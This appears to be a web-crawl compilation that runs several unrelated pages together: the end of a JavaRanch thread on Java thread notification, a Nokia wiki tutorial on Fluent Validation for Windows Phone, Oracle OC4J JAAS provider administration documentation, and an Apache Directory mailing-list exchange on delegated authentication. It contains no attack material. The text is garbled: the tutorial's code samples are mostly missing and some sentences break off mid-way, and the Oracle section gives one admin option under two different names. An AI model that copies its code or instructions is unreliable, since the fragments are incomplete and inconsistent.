doing when the notifyAll() is sent. That will help increase understanding of what's really happening. Hope that helps...
"I'm not back." - Bill Harding,
Twister
Chris Hurst
Ranch Hand
Joined: Oct 26, 2003
Posts: 420
2
I like...
posted
Apr 23, 2007 06:23:00
0
Try a sleep(1) after returning from addCommandPakcet in the other thread (not in the sync'ed block).
Also your wait should really be in a loop of some form i.e. spurious thread wake up (rare but possible for wait to return without notify)
"Eagles may soar but weasels don't get sucked into jet engines" SCJP 1.6, SCWCD 1.4, SCJD 1.5,SCBCD 5
Mr. C Lamont Gilbert
Ranch Hand
Joined: Oct 05, 2001
Posts: 1170
I like...
posted
Apr 24, 2007 07:37:00
0
I suspect by the time you call notify, many of your threads have already returned and are not waiting. So it may look like they are ignoring the call, but its because they were no longer waiting when the call was made.
I agree. Here's the link:
subject: Why notify/notifyAll() method doesnt invoke a waiting thread quickly?????
Similar Threads
Queue with Threads
Queing of several request threads
Socket Server only processing one request, then it just queues them up
ThreadPool, don't execute two jobs simultaneously if certain conditions are met
ConcurrentLinkedQueue
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton
|
http://www.coderanch.com/t/233764/threads/java/notify-notifyAll-method-doesnt-invoke
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
.
Data validation using Fluent Validation in Windows Phone
This article explains how to validate data in Windows Phone 8 using the Fluent Validation library.
Windows Phone 8
Introduction
Data validation is required almost everywhere an app takes data input. There are many approaches for Sliverlight/WPF and most of them will also work in Windows Phone.
This code example explains how to use the Fluent Validation library (available on Nuget), which describes itself as "a small validation library for .NET that uses a fluent interface and lambda expressions for building validation rules for your business objects". The library is simple to use and makes it very easy to define complex but readable validation rules.
The demo app is a simple user registration form into which a user can enter their name, birth date and country. The example integrates with the MVVM Light Toolkit and its SimpleIoc. The Fluent Validation codeplex page has additional examples.
Adding the package
We start of with an empty solution, add the MVVM Light libraries, bind the datacontext of MainPage to MainViewModel in the normal way. Once the MVVM setup is complete it’s time to add the Fluent Validation package to the project.
Install-Package FluentValidation
Fluent Validation is an open source project available on Codeplex
The settings of the portable class library are shown below. Note, the implementation below will work just as well on Windows Store apps!
The full set of libraries supported by Fluent Validation is: .NET 4.0, MVC 3, MVC 4, MVC 5, Portable
Creating the model
There is only one model class in this app, called Member. This defines the user's name, birth date, and country.
public class Member
{
public string Name { get; set; }
public DateTime BirthDate { get; set; }
public string Country { get; set; }
}
Setting up the validation
There is some work involved in getting everything setup. Don’t worry, it's not rocket science.
First create a ValidatorFactory. This is needed because we use SimpleIoc to inject the validators into the ViewModels.
A ValidatorFactory class inherits from the ValidatorFactoryBase class included in the library.;
}
}
The constructor of the ValidatorFactory is where all validators are being registering. You could do this in the ViewModelLocator as well, like any other class / repository / viewmodel, but this keeps the ViewModelLocator cleaner and keeps the validation logic a bit closer together.
The CreateInstance function needs to be overridden and returns the instance of the requested validator.
Building a validator:
SimpleIoc.Default.Register<ValidatorFactory>(true);
We pass in true as parameter to make sure the object is instantiated at the moment of registration, that way all validators are registered in the IOC as well (as seen in the ValidatorFactory's constructor).
As a reference, these are all the built in validators
- NotNull
- NotEmpty
- NotEqual
- Equal
- Length
- LessThan
- LessThanOrEqual
- GreaterThan
- GreaterThanOrEqual
- Predicate
- RegEx
Quite an impressive list, and probably most of what developers will need. Just in case that the one that you need isn't included, you can build your own, we'll discuss that in a bit. Let’s get these rules to work first.
Validating data
At this point there is a a factory and validator, and they are all are getting registered in our IOC. Now we hook up the ViewModels and start validating.
In the MainViewModel add a property of type Member to);
}
To validate an instance we call the Validate() function on a validator for that type, in this case "Member". date I get this.
Our validation is working! But those messages could be a bit better. Fluent Validator provides us with options to adjust the property name or the entire message. Change the constructor of the MemberValidator to this.)
Summary.
Note: This article was originally posted in Nico's Blog)
|
http://developer.nokia.com/community/wiki/Data_validation_using_Fluent_Validation_in_Windows_Phone
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
This chapter describes how to manage the Oracle9iAS Containers for J2EE (OC4J) JAAS Provider in Java2 Platform, Standard Edition (J2SE) and Java2 Platform, Enterprise Edition (J2EE) environments.
This chapter contains these topics:
Managing the JAAS provider in the J2SE and J2EE environments involves creating and managing realms, users, roles, permissions, and policy.
How you manage the JAAS provider depends on two things:
-PermissionClassManager
-PrincipalClassManager
-LoginModuleManager
Table 7-1 describes the general functionality of each tool in both XML-based and LDAP-based provider type environments.
XML-based and LDAP-based JAAS providers enable different functionalities as described in Table 7-2.
You can use Oracle Enterprise Manager to perform two JAAS provider tasks:
Oracle Enterprise Manager functionality for the JAAS provider is currently only available for the LDAP provider environment and only for policy management tasks.
To use the Oracle Enterprise Manager to perform JAAS provider tasks, navigate to the Oracle9i Application Server entry, then to the OC4J system component, and select the application default as follows:
To access the JAAS Provider:
The System Components panel appears:
Text description of the illustration syscom.gif
The main window for the JAAS provider appears:
Text description of the illustration jpolicy0.gif
Policies, which store JAAS authorization rules, consist of one or more grants or grant entries. Grant entries are grantees (principals and codesource (optional)) and their assigned permissions.
Managing JAAS Policy enables you to:
To search for and view grant entry data:
The JAAS Policy Management window appears. This is the same as the main JAAS provider window. See "Accessing the JAAS Provider".
The window immediately displays a results list that you can modify by entering a search phrase or using arrows that guide you to subsequent sections of the results list.
Wild cards are implied, that is, if you enter several letters, the results list shows all entries that begin with those letters, assuming the case is the same.
For the grant name you have entered, the following data appears:
To delete grant entry data:
To create a new grant entry:
The JAAS Policy Management window appears.
The New Grant: Name/CodeSource window appears, and enables you to enter a name for the new grant entry and define a codesource. The codesource is the code associated with the policy entry.
Text description of the illustration jpolicyc.gif
The New Grant: Principal(s) window appears and enables you to select the principal type and enter one or more principals to define the grant entry.
The available principal types are:
Text description of the illustration jpolicyd.gif
If you have selected the LDAP type, the name must be an X.500 distinguished name. Although the system accepts other names, they will be rejected when you finish. For other types, you can enter any name.
The New Grant: Permission window appears and enables you to enter the permission class, target, and action for the grant entry. These are essentially what the user is authorized to do with your application.
java.io.FilePermission).
Text description of the illustration jpolicya.gif
The entry is now granted these permissions on the designated target. The grant entry is complete.
The Java Permissions task enables you to search for and view the permissions of a principal on a given codesource and revoke these permissions. You can search by principal class or principal name.
To search for permissions on a principal:
The Permission Management window appears:
Text description of the illustration jpolicyb.gif
The available principal types are:
The results display on-screen including permission class, permission target, and permission actions, but the codesource does not appear.
To revoke permissions assigned to a principal:
You can only revoke one permission at a time.
The JAZN Admintool can manage both XML-based and LDAP-based JAAS provider data from the command prompt.
The JAZN Admintool is a flexible Java console application, with functions that can be called directly from the command line or through the shell interface of the Admintool. The shell uses UNIX-derived commands to perform specific JAAS provider functions.
This section includes the following topics:
The following examples illustrate the different ways that the JAZN Admintool commands can be used.
From the UNIX command line:
java -jar jazn.jar -listusers foo
From the shell interface of the Admintool (using command-line options):
JAZN:> listusers foo
From the shell interface of the Admintool (through modified UNIX commands):
JAZN:> cd /realms/foo/users JAZN:foo> ls
From the UNIX command line:
java -jar jazn.jar -addrole foo fooRole
From the shell interface of the Admintool (using command-line options):
JAZN:> addrole foo fooRole
From the JAAS provider shell (through modified UNIX commands):
JAZN:> cd /realms/foo/users JAZN:foo> mkdir fooRole
The JAZN Admintool provides the following command options, which are described in greater detail in the following sections. The JAZN Admintool command options can be invoked several different ways as described in "Usage Examples". Error messages display if the syntax or parameters specified are incorrect.
-addrealm realm admin {adminpwd adminrole|adminrole userbase rolebase realmtype} -addrole realm role -adduser realm username password -checkpasswd realm user [-pw password] -grantrole role realm {user|-role to_role} -listrealms -listroles [realm [user|-role role]|-perm permission] -listusers [
realm[-role role|-perm permission]] -remrealm realm -remrole realm role -remuser realm user -revokerole role realm {user|-role to_role} -setpasswd realm user old_pwd new_pwd
-addperm permission permission_class action target [description] -addprncpl principal_name prncpl_class params [description] -grantperm realm {user|-role role} permission_class permission_actions -listperms realm {user |-role role|-realm realm} -listperm permission -listprncpls -listprncpl principal_name -remperm permission -remprncpl principal_name -revokeperm realm {user|-role role} permission_class permission_actions
-shell
-getconfig default_realm admin password
-convert filename realm
-help -version
-addrealm realm admin {adminpwd adminrole | adminrole userbase rolebase realmtype} -remrealm realm
The
-addrealm option creates a realm of the specified type with the specified name, and
-remrealm deletes a realm.
Valid realm types are:
The user must provide the following:
-addrole realm role -remrole realm role
The
-addrole option creates a role in the specified realm, and
-remrole deletes a role from the realm.
-adduser realm username password -remuser realm user
The
-adduser option adds a user to a specified realm, and
-remuser deletes a user from the realm.
-checkpasswd [realm] user [-pw password]
The
-checkpasswd option indicates whether the given user requires a password for authentication. If
-pw is used, it displays a message indicating whether the specified password authenticates the user.
-grantrole role realm {user|-role to_role} -revokerole role realm {user|-role to_role}
The
-grantrole option grants the specified role to a user (when called with a user name) or a role (when called with
-role). The
-revokerole option revokes the specified role from a user or role.
-listrealms
The
-listrealms option displays all realms in the current JAAS provider environments.
-listroles [realm [user|-role role|-perm permission]]
The
-listroles option displays a list of roles that match the list criteria. This option lists the following:
role, when called with a realm name and the option
-role
permission, when called with a realm name and the option
-perm
-listusers [realm [-role role|-perm permission]]
The
-listusers option displays a list of users that match the list criteria. This option lists the following:
-roleor
-perm
-setpasswd realm user old_pwd new_pwd
The
-setpasswd option allows administrators to reset the password of a user given the old password.
-addperm permission permission_class action target [description] -remperm permission
The
-addperm option registers a permission with the JAAS provider
PermissionClassManager. The
-remperm option unregisters the specified permission class.
permission and
description can be multiple words if enclosed by quotation marks ("").
-addprncpl principal_name prncpl_class params [description] -remprncpl principal_name
The
-addprncpl option registers a principal with the JAAS Provider
PrincipalClassManager. The
-remprncpl option unregisters the specified principal class.
principal_name and
description can be multiple words if enclosed by quotation marks ("").
-grantperm realm {user|-role role} permission_class permission_actions -revokeperm realm {user|-role role} permission_class permission_actions
The
-grantperm option grants the specified permission to a user (when called with a username) or a role (when called with
-role). The
-revokeperm option revokes the specified permission from a user or role. A permission is denoted by its explicit class name (for example,
oracle.security.jazn.realm. RealmPermission) and its action and target parameters (for
RealmPermission, realmname
action). Note that there may be multiple action and target parameters.
-listperms realm {user |-role role| realm realm}
The
-listperms option displays all permissions that match the list criteria. This option lists the following:
PermissionClassManager
-role
-listperm permission
The
-listperm option displays detailed information about the specified permission, including the permission's display name, class, description, actions, and targets.
-listprncpls
The
-listprncpls option lists all principal classes registered with the
PrincipalClassManager.
-listprncpl principal_name
The
-listprncpl option displays detailed information about the specified principal, including the display name, class, description, and actions.
-shell
The
-shell option starts an JAAS provider interface shell. The JAAS Provider shell provides interactive administration of JAAS provider principals and policies through a UNIX-derived interface.
-getconfig default_realm admin password
The
-getconfig option displays the current configuration setting in
jazn.xml.
-migrates filename realm|
The
-migrate option migrates the OC4J
principals.xml file into the specified realm of the current JAAS provider.
filename specifies the name and location of the OC4J principals file (typically stored in
j2ee/home/config/principals.xml).
The migration converts
principals.xml users to JAAS Provider
RealmUsers and
principals.xml groups to JAAS Provider roles. All permissions previously granted to a
principals.xml group are mapped to the JAAS Provider role. All users that were deactivated at the time of migration are not migrated. This is to ensure that no users can inadvertently gain access through the migration.
An error is returned if the specified file contains errors.
The
-help option displays a list of command options available with the JAZN Admintool.
The JAZN Admintool includes a shell called the JAZN shell interface. The JAZN shell provides an interactive interface to the JAAS Provider API.
The shell directory structure consists of nodes, where nodes contain subnodes that represent the parent node's properties. Figure 7-1 shows the node structure:
Text description of the illustration jazdg013.gif
In this structure, the
user and
role nodes are linked together. Consequently, if you are at
/realms/realm/users/user/roles in the tree and type
cd
role, you are taken to
/realms/realm/roles/
role.
Another way to look at this, is that
role 1 is a symbolic link of
role 2.
Figure 7-2 shows nodes of the
xmlRealm created by the
jazn-data.xml file in "Sample jazn-data.xml Code".
Text description of the illustration jazdg014.gif
The JAZN shell can be recognized by the shell prompt
JAZN:>. At any point in time, the prompt indicates which realm the administrator is managing. The following is an example:
JAZN:> cd foo JAZN:foo> ls
To start the shell, invoke the JAZN Admintool with the
-shell option, as follows:
java -jar jazn.jar -shell
Shell commands consists of the command options in "Realm Operations" and the following series of UNIX derived commands for viewing the principals and policies in the structured way. Relative and absolute paths are supported for all relevant commands.
Using the ls Command to List JAAS Provider Data
ls[path]
The
ls command mirrors its UNIX counterpart and lists the contents of the current directory or node. For example, if the current directory is the root,
ls lists all realms. If the current directory is
/realm/users, then
ls lists all users in the realm. The results of the listing depends on the current directory. The
ls command can operate with the
* wildcard.
cd path
The
cd command, mirroring its UNIX counterpart, allows users to navigate the directory tree. Relative and absolute path names are supported. To exit a directory, type
cd
... Entering
cd
/ returns the user to the root node. An error message is displayed if the specified directory does not exist.
mkdir directory_name [other_parameter] mk directory_name [other_parameter] add directory_name [other_parameter]
The
mkdir,
mk, and
add commands are synonyms of a command that creates a new subdirectory or node in the current directory. For example, if the current directory is the root, it creates a realm. If the current directory is
/realm/users, it creates a user. The effect of
mkdir depends upon the current directory. Some commands require additional parameters in addition to the name.
rm directory_name
The rm command mirrors its UNIX counterpart and removes the directory or node in the current directory. For example, if the current directory is the root, it removes the specified realm. If the current directory is
/realm/users, it removes the specified user. The effect of
rm depends on the current directory. An error message is displayed if the specified directory does not exist.
The
rm command can operate with the
* wildcard.
pwd
The
pwd command displays the current location of the user through the UNIX directory format. Undefined values are left blank in this listing.
The
help command displays a list of all valid commands.
man command_option man shell_command
The
man command mirrors its UNIX counterpart and displays more detailed usage information for the specified shell command or JAZN Admintool command option. Where information presented by the
man page and this document conflict, this document contains the correct usage for the command.
clear
The
clear command clears the terminal screen by displaying 80 blank lines.
exit
The
exit command exits the JAZN shell.
You can manage JAAS provider data by creating Java programs using the JAAS Provider APIs.
This section discusses the JAAS provider in LDAP environments. The emphasis is on Java programming, but it also provides useful information for those using Oracle Enterprise Manager or the JAZN Admintool.
This section contains the following topics:
Some sample Java programs for managing LDAP environments are provided for you. In the sample code, objects to be modified are presented in bold.
For some of the samples in the following chapters, relationships between samples are discussed after the sample code:
The types of code sample relationships discussed include the following:
The
JAZNContext and
JAZNConfig classes of the package
oracle.security. jazn serve as a starting point for the JAAS provider. The
JAZNContext and
JAZNConfig classes contain methods such as
getPolicy,
getProperty, and
getRealmManager that automatically retrieve information specific to the current JAAS provider instance.
The
JAZNConfig class is designed for use with multiple instances of the JAAS provider.
The following code sample illustrates how
JAZNContext or
JAZNConfig are used in creating a realm in an LDAP-based environment:
RealmManager realmMgr = JAZNContext.getRealmManager(); ... realm = realmMgr.createRealm("abcRealm", realmInfo);
After you have installed and configured the required components, you must create realms. A realm is a user community instance maintained by the authorization system. Realms consist of a user manager and role manager, and provides access to an LDAP-based provider environment of users and roles (groups).
This section contains the following topics:
Realms are created using the
createRealm() method of the
RealmManager class, which requires the following information:
adminRole)given to the administrator. This role can then be granted to others, giving them administrative privileges
adminUser), a user with administrative privileges
An External Realm is an LDAP-based realm that integrates existing user communities (user and role information not currently stored under the JAAS Provider context) with the JAAS provider.
User and role management in an External Realm must be handled by an Oracle Internet Directory tool.
The following code sample creates an External Realm with the objects shown in Table 7-3. The objects to be modified are presented in bold.
import oracle.security.jazn.spi.ldap.*; import oracle.security.jazn.*; import oracle.security.jazn.realm.*; import java.util.*; /** * Creates an external realm. */ public class CreateRealm extends Object { public CreateRealm() {}; public static void main (String[] args) { CreateRealm test = new CreateRealm(); test.createExtRealm(); } void createExtRealm() { Realm realm=null; try { Hashtable prop = new Hashtable(); prop.put(Realm.LDAPProperty.USERS_SEARCHBASE,"cn=users,o=abc.com"); prop.put(Realm.LDAPProperty.ROLES_SEARCHBASE,"cn=roles,o=abc.com"); // specifying the following LDAP directory object class // is optional. When specified, it will // be used as a filter to search for users prop.put(Realm.LDAPProperty.USERS_OBJ_CLASS,"orclUser"); // adminUser is optional String adminUser = "John.Singh"; String adminRole = "administrator"; RealmManager realmMgr = JAZNContext.getRealmManager(); InitRealmInfo realmInfo = new InitRealmInfo(InitRealmInfo.RealmType.EXTERNAL_REALM, adminUser, adminRole, prop); realm = realmMgr.createRealm("abcRealm", realmInfo); } catch (Exception e) { e.printStackTrace(); } } }
An Application Realm is an LDAP-based realm that supports external read-only users and internal role management.
The code for creating an Application Realm is similar to the code for creating an External Realm, with the following exceptions:
InitRealmInfo.RealmTypeis
APPLICATION_REALM
prop.put(Realm.LDAPProperty.ROLES_SEARCHBASE, "cn=roles,o=
defaultOrganization
");
The
RealmManager class of package
oracle.security.jazn.realm enables you to drop a realm.
The following code sample shows how to drop a realm:
RealmManager realmMgr = JAZNContext.getRealmManager(); realmMgr.dropRealm("abcRealm");
The JAAS provider administrator and the realm administrator both have permission to drop a realm.
You cannot create or manage users directly in the JAAS provider if you are using an LDAP-based provider type. For those tasks, use an Oracle Internet Directory tool.
You can add users to a realm using the realm's
UserManager interface, as shown in the following code:
UserManager usermgr = realm.getUserManager(); RealmUser user = usermgr.getUser("Chitra.Kumar");
The
RoleManager interface provides methods to manage roles. Table 7-4 describes some of the methods available with the
RoleManager interface.
Table 7-4 RoleManager Methods
Managing roles requires getting the realm from the
RealmManager as described in "The JAZNContext and JAZNConfig Classes". After that, you get an instance of the
RoleManager interface with the method you are calling.
This section contains these topics:
Roles are created either externally in an External Realm with an Oracle Internet Directory tool or internally in an Application Realm with
RoleManager.
The following code sample shows how to create a role with
RoleManager:
RoleManager rolemgr = realm.getRoleManager(); RealmRole role = rolemgr.createRole("devManager_role");
You can grant roles in an Application Realm, but not in an External Realm.
Roles are granted by an instance of
RoleManager.
These lines show how to grant a role:
RoleManager rolemgr = realm.getRoleManager(); ... rolemgr.grantRole(user, director_role);
These lines are key to the sample code show in Example 7-2.
This sample code demonstrates granting a role,
manager_role, to another role,
director_role, and granting the
director_role to a user,
Chitra.Kumar. Consequently,
Chitra is granted the
director_role directly, and the
manager_role indirectly.
The objects to be modified are presented in bold.
import oracle.security.jazn.spi.ldap.*; import oracle.security.jazn.*; import oracle.security.jazn.realm.*; import java.util.*; public class GrantRole extends Object { public GrantRole() {} public static void main (String[] args) { GrantRole test = new GrantRole(); test.grantRole(); } void grantRole() { try { RealmManager realmMgr = JAZNContext.getRealmManager(); Realm realm = realmMgr.getRealm("devRealm"); RoleManager rolemgr = realm.getRoleManager(); RealmRole manager_role = rolemgr.getRole("manager_role"); RealmRole director_role = rolemgr.getRole("director_role"); UserManager usermgr = realm.getUserManager(); RealmUser user = usermgr.getUser("Chitra.Kumar"); /* grants manager_role to director_role */ rolemgr.grantRole( director_role, manager_role); /* grants director_role to Chitra */ rolemgr.grantRole( user, director_role); } catch (JAZNException e) { System.out.println("Exception "+e.getMessage()); } } }
The following code sample shows how to drop a role with
RoleManager:
RoleManager rolemgr = realm.getRoleManager(); rolemgr.dropRole("devManager_role");
Permissions are extended from the
java.security.Permission class. The JAAS provider provides four classes of permissions representing types of actions that can be performed. See Table 4-2 for the list of permissions.
Permissions are all created with constructors such as the following
RealmPermission:
RealmPermission Perm1 = new RealmPermission("devRealm", "createRole");
JAAS provider policy grants permissions to principals, such as users and roles. The policy can be modified after initialization to grant and revoke permissions to grantees.
These lines of code are key to the sample class shown in "Modifying User Permissions Code".
final JAZNPolicy policy = JAZNContext.getPolicy(); ... policy.grant(new Grantee(propset, cs), new
FilePermission("report.data", "read"));
You can manage JAAS provider data by modifying XML files used by the JAAS Provider APIs.
This section discusses the JAAS provider in XML-based provider environments. The emphasis is on data files that you create yourself based on the XML schema, but it also provides useful information for those using the JAZN Admintool.
The XML-based environment provides fast, simple, lightweight JAAS provider management. You can use an XML file (named
jazn-data.xml in this example) to manage the JAAS provider realm and policy information. Table 7-6 describes the sections of the
jazn-data.xml file.
The
jazn-data.xml file is specified as follows:
jazn.xmlconfiguration file
orion-application.xmlconfiguration file
XML realm and provider information is stored in an XML file typically named
jazn-data.xml. To work correctly, the XML file must conform to specific policy schema and DTD standards.
The XML data file must conform to the following DTD:
<!ELEMENT jazn-data (jazn-realm?, jazn-policy?, jazn-permission-classes?, jazn-principal-classes?, jazn-loginconfig?)> <!-- Realm Data --> <!ELEMENT jazn-realm (realm*)> <!ELEMENT realm (name, users?, roles?, jazn-policy?)> <!ELEMENT users (user*)> <!ELEMENT user (name, display-name?, description?, credentials?)> <!ELEMENT name (#PCDATA)> <!ELEMENT display-name (#PCDATA)> <!ELEMENT description (#PCDATA)> <!ELEMENT credentials (#PCDATA)> <!ELEMENT roles (role*)> <!ELEMENT role (name, display-name?, description?, members)> <!ELEMENT members (member*)> <!ELEMENT member (type, name)> <!ELEMENT type (#PCDATA)> <!-- Policy Data --> <!ELEMENT jazn-policy (grant*)> <!ELEMENT grant (grantee, permissions?)> <!ELEMENT grantee (display-name?, principals?, codesource?)> <!ELEMENT principals (principal*)> <!ELEMENT principal (realm-name?, type?, class, name)> <!ELEMENT realm-name (#PCDATA)> <!ELEMENT codesource (url)> <!ELEMENT url (#PCDATA)> <!ELEMENT permissions (permission+)> <!ELEMENT permission (class, name, actions?)> <!ELEMENT class (#PCDATA)> <!ELEMENT actions (#PCDATA)> <!-- Principal Class Data --> <!ELEMENT jazn-principal-classes (principal-class*)> <!ELEMENT principal-class (name, description?, type, class, name-description-map?)> <!ELEMENT name-description-map (name-description-pair*)> <!ELEMENT name-description-pair (name, description?)> <!-- Permission Class Data --> <!ELEMENT jazn-permission-classes (permission-class*)> <!ELEMENT permission-class (name, description?, type, class, target-descriptors, action-descriptors?)> <!ELEMENT target-descriptors (target-descriptor*)> <!ELEMENT target-descriptor (name, description?)> <!ELEMENT action-descriptors (action-descriptor*)> <!ELEMENT action-descriptor (name, description?)> <!-- Login Module Data --> <!ELEMENT jazn-loginconfig (application*)> <!ELEMENT application (name, login-modules)> <!ELEMENT login-modules (login-module+)> <!ELEMENT login-module (class, control-flag, options?)> <!ELEMENT control-flag (#PCDATA)> <!ELEMENT options (option+)> <!ELEMENT option (name, value)> <!ELEMENT value (#PCDATA)>
There are three additional utilities for managing the JAAS provider. These classes work with both LDAP-based and XML-based provider types. The classes can be used and managed programmatically. Additionally, two can be managed through the JAZN Admintool.
PermissionClassManager- Integrates with the JAZN Admintool
PrincipalClassManager- Integrates with the JAZN Admintool
LoginModuleManager- Works only with J2EE applications and is not activated with the JAZN Admintool
The
PermissionClassManager is a repository of all registered Permission classes and a utility to help manage them. Registering a permission class allows access to stored metadata that provides specific information about a given permission's target, action, and/or description. Failure to register a given permission class does not affect the JAAS provider's ability to use the permission class. That is, the JAAS provider does not limit permission grants or revocations to those classes registered with the
PermissionClassManager.
Works with the JAZN Admintool to perform these functions:
PrincipalClassManager represents the repository of all registered Principal classes and a utility to help manage them.'ve been registered with the
PrincipalClassManager.
The
PrincipalClassManager works with the JAZN Admintool to perform these functions:
LoginModuleManager is the JAAS Provider implementation of the JAAS Configuration class and provides login configuration support to applications. The Configuration class is a registry of applications and corresponding login modules used by a given application and the order they are to be used. There are both
LDAPLoginModuleManager and
XMLLoginModuleManager implementations of the
LoginModuleManager.
|
http://docs.oracle.com/cd/A97329_03/web.902/a95879/jaas_man.htm
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
I was writing up a little game kit, when i ran into a little problem. When you enter a command, it skips past all the if/else statements, and defaults to the final else statement.
import java.util.*; //used to make imput work class Text_Game_Kit { //main method, where the game takes place public static void main(String args[]) { //Declaring everything //position as a Y cordinate int POSY = 0; //position as an X cordinate int POSX = 0; //Placeholder for input String input = ""; //The First Chest is not open boolean Chest1 = false; String Chest1OPCL = " closed"; // the first chest is closed. This is to enhance the text. //Is there an enemy? boolean enemy = false; String enemyname = ""; //Type of enemy. i.e. Skeleton, Zombie, etc. // boolean to see if the game is done boolean done = false; //if the game is not done, keep running while (!done) { //quickly check if the game is done. if it is, break everything if (done) { break; } //these are commands. try to see how they work. all commands must be lowercase. //Movement Outputs: tells the user what the character sees if (POSX==0&&POSY==0) //If you are at the starting position: 0,0. You see a chest from here. Reach it by saying "move up" 3 times. { System.out.println("You wake up in a poorly lit room. You see a" + Chest1OPCL + " chest 3 steps to the north"); } else if (POSX==0&&POSY==3) //You have just moved up 3 times. you can open the chest by saing "open" { System.out.println("There is a" + Chest1OPCL + " chest in front of you."); } //Danger Commands: tells the user other information besides the Movement Outputs if (enemy) { System.out.println("You are being attacked by a" + enemyname + "."); } //Get the input input=in(); //handle the input. This includs all do able commands. typing help will list them. typing help and then a command will describe it. The only changing here should be to add commands //Moving Commands if (input==("up")) { POSY++; //move up } else if (input==("down")) { POSY--; //go down } else if (input==("left")) { POSX--; //move left } else if (input==("right")) { POSX++; //move right } //opening commands: deals with: is there a chest, is it open, and what happens else if (input==("open")) { if (POSX==0&&POSY==3&&!Chest1) //if the chest isnt open and you are at 0,3: the place where chest1 is. { System.out.println("You open the chest and find a sword. You hear the rattling of bones behind you."); enemy=true; enemyname=" Skeleton"; Chest1=true; Chest1OPCL="n open"; //now text thinks its open // you open the chest and are now being attacked by a skeleton. use "attack" to kill it. } // you can insert more chests here, you must use else if //if there is no chest else { System.out.println("You see nothing to open!"); } } //Attacking Command else if (input=="attack") { if (enemy) { System.out.println("You attack a" + enemyname + ". It falls rather easily."); //Staging. this is rather difficult because the attack command dosent know what you just attacked. if (enemyname == " Skeleton") { done=true; //in this short kit, killing the skeleton is the end. however, you can use anything here. if you want, you can make this progress, or have another enemy pop up, a door open, etc. if you need help here, just ask. I understand its a bit vague. } } else { System.out.println("You find nothing to attack, so you swing at the air for good measure"); } } //help, and any variants. Add more if you make new commands else if (input=="help") { System.out.println("Commands are: up, down, left, right, open, help, and attack. Say help with a command after it to see more information"); //make sure to put any added here. } //indepth command help else if (input=="help up") { System.out.println("This makes you move fowdard"); } else if (input=="help down") { System.out.println("This makes you move backwards"); } else if (input=="help left") { System.out.println("This makes you move left"); } else if (input=="help right") { System.out.println("This makes you move right."); } else if (input=="help open") { System.out.println("This opens a chest, if there is one."); } else if (input=="help attack") { System.out.println("This attacks an enemy, if there is one."); } else if (input=="help help") { System.out.println("You IQ must me in the double digits"); } //The end of the command cycle. all other commands must be above this else { System.out.println("That is not a command. Try using help to find more commands."); } } //end of the loop. only goes here when the game is done System.out.println("Congradulations! You've won!"); } //This method gets input public static String in() { Scanner scan=new Scanner(System.in); String word = "Temp"; word=scan.next(); return word; } }
|
http://www.javaprogrammingforums.com/whats-wrong-my-code/37914-bad-output.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
On Fri, Nov 19, 2010 at 12:37 PM, Alex Karasulu <akarasulu@apache.org> wrote:
>
>
> On Fri, Nov 19, 2010 at 12:29 PM, Kiran Ayyagari <kayyagari@apache.org>
> wrote:
>>
>> On Fri, Nov 19, 2010 at 12:14 PM, Alex Karasulu <akarasulu@apache.org>
>> wrote:
>> > Hi Emmanuel, Antione,
>> >
>> > On Fri, Nov 19, 2010 at 11:41 AM, Emmanuel Lecharny
>> > <elecharny@gmail.com>
>> > wrote:
>> >>
>> >> Hi guys,
>> >>
>> >> yesterday, we had an interesting convo with Antoine, about the
>> >> definition
>> >> of a dedicated Authenticator, and how to configure it.
>> >>
>> >
>> > Excellent. Thanks for posting to the ML about it.
>> >
>> >>
>> >> First, the Authenticator interface can be implemented but it's probably
>> >> a
>> >> better idea to extend the AbstractAuthenticator, as it brings some
>> >> references to teh underlying DirectoryService for free, plus some
>> >> default
>> >> implementations to init and dispose the Authenticator. One thing to
>> >> take
>> >> care of is the PasswordPolicy which can be enabled or disabled. We have
>> >> to
>> >> determinate the best way to deal with this service.
>> >>
>> >
>> > PasswordPolicy AFAICT is something that kicks in when updating or
>> > creating a
>> > new password. This mechanism of delegating authentication to some
>> > external
>> > authentication service in this case AD does not change the password.
>> > Hence
>> > why I'm thinking we don't need to worry about PP.
>> > Or am I missing something here?
>> >
>> PP also comes into picture while performing a bind and compare(of
>> password) operations
>> an e.x to determine the number of failed authentication attempts
>> but all this makes sense only if the user entries are stored in the
>> local server (ApacheDS in this case).
>
> Are we tracking login results (successes/failures) per user in their profile
> (LDAP entry)?
yes we do and these details are stored in the user entry itself
> Are we tracking login attempts when the bind principal is non-existant and
> if so where we doing that?
we cannot, if we don't have the user entry locally on the server
> We should also perhaps track the last IP where
> the login occurred to prevent those trying to dictionary attack via some
> account but this is not so much related to PP.
>>
yeah
>> >>
>> >> Another aspect is the Authenticator configuration : how to inject it
>> >> and
>> >> have it available when the server is stopped and restarted? The
>> >> solution is
>> >> probably to extend the existing configuration, which is based on the
>> >> DIT.
>> >> That means defining a specific Bean, plus the associated OC and AT. We
>> >> have
>> >> to think about it, and I would suggest we try to write a prototype that
>> >> demonstrates the way to extend the configuration. It has to be
>> >> documented,
>> >> as the Authenticator is an extension point.
>> >>
>> >
>> > Yes some configuration will be needed to activate and leverage this
>> > Authenticator.
>> > I do understand that there is some limited time and we need a simple
>> > implementation specifically for AD (most users will use this external
>> > authentication service) which is a great starting point. However let me
>> > some ideas that I had very early on about this matter that several
>> > perspective clients years ago expressed they needed.
>> > First though before going on I want to mention that this is getting
>> > really
>> > close in nature to what SASL was designed for but I think this mechanism
>> > might be much more flexible. With that let me continue ...
>> > Prescriptive Delegation
>> > ---------------------------------
>> > Not every principal or user in ApacheDS will need to be delegated.
>> > Essentially this comes down to selective delegation. Whether to use
>> > ApacheDS
>> > authentication directly, or delegate and to which external
>> > authentication
>> > mechanism to delegate to is something that users mentioned they would
>> > like
>> > with this capability. Theirs even a more acute case where sometimes the
>> > binding principal might not even exist in ApacheDS yet you want
>> > delegation
>> > to occur.
>> > The holistic means to solve this problem is by using the administrative
>> > model to specify regions of the DIT you can dice and slice to have fine
>> > grained control over authentication delegation. With the administrative
>> > model you can specify subtree specifications and refinements that will
>> > select specific entries in the DIT. When a bind occurs against selected
>> > areas different delegation mechanisms can be associated with those
>> > selections using subentries associated with them. This prescriptive
>> > specification of selected entries allows you to specify bind principals
>> > and
>> > DIT regions that do not even exist and still enable delegated
>> > authentication. This might be good especially if you don't want to deal
>> > with
